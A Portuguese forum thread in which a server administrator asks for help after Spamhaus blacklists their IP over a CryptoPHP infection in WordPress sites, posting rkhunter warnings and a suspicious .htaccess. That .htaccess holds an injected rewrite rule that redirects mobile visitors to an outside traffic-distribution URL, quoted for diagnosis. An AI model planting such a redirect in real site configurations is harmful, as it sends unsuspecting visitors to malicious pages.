conta do servidor hackeada (CMS)

[opencag]

Boa tarde,

 

Hoje o IP do servidor caiu na spamhaus, quando fui verificar caiu na lista de trojan.

 

Parece que um site wordpress está contaminado com ""CryptoPHP".

 

Congelei 3 contas que tinha o arquivo "social.png" que utiliza wordpress.

 

Meu medo é que o servidor foi comprometido, bom vou postar os logs do rkhunter, acredito que não foi comprometido, os resultados devem ser falso-positivo (WARNING):

 

[10:35:28]   /sbin/ifdown                                    [ Warning ]
[10:35:28] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[10:35:29]   /sbin/ifup                                      [ Warning ]
[10:35:29] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
 
 
 
[10:35:49]   /usr/bin/GET                                    [ Warning ]
[10:35:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: a /usr/bin/perl -w script text executable
 
 
[10:35:51]   /usr/bin/ldd                                    [ Warning ]
[10:35:51] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable
 
[10:35:58]   /usr/bin/whatis                                 [ Warning ]
[10:35:58] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: POSIX shell script text executable
 
[10:49:38]   Checking for hidden files and directories       [ Warning ]
[10:49:38] Warning: Hidden directory found: /dev/.mdadm
[10:49:38] Warning: Hidden directory found: /dev/.udev
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[10:49:38] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text

[Leo Amarante]

Pois é, tive uma dor de cabeça tremenda com essa blacklist => http://www.spamhaus.org/xbl/

 

Ela esta listando IP's que contenham sites utilizando CryptoPHP com ou sem backdoor instalados e consequentemente bloqueios e mais bloqueios em servidores de e-mail, em especial hotmail.

 

Dois VPS de clientes estavam usando mesmo ip compartilhado no exim, tivemos que alterar tudo para usar um IP diferente.

 

O problema é que apenas um dos VPS's havia um site em wordpress com um plugin criptografado.

[opencag]

Você conseguiu achar qual é o site que está infectado ?

 

Tenho 4 contas, achei uma suspeita veja só o .htaccess

 

 

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^al$
RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]
RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]
RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302]
# BEGIN W3TC Browser Cache
<IfModule mod_deflate.c>
    <IfModule mod_headers.c>
        Header append Vary User-Agent env=!dont-vary
    </IfModule>
        AddOutputFilterByType DEFLATE text/css text/x-component application/x-javascript application/javascript text/javascript text/x-js text/html text/richtext image/svg+xml text/plain text/xsd text/xsl text/xml image/x-icon applicati$
    <IfModule mod_mime.c>
        # DEFLATE by extension
        AddOutputFilter DEFLATE js css htm html xml
    </IfModule>
</IfModule>
# END W3TC Browser Cache
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
 
# END WordPress

[opencag]

Desculpa postei replicado.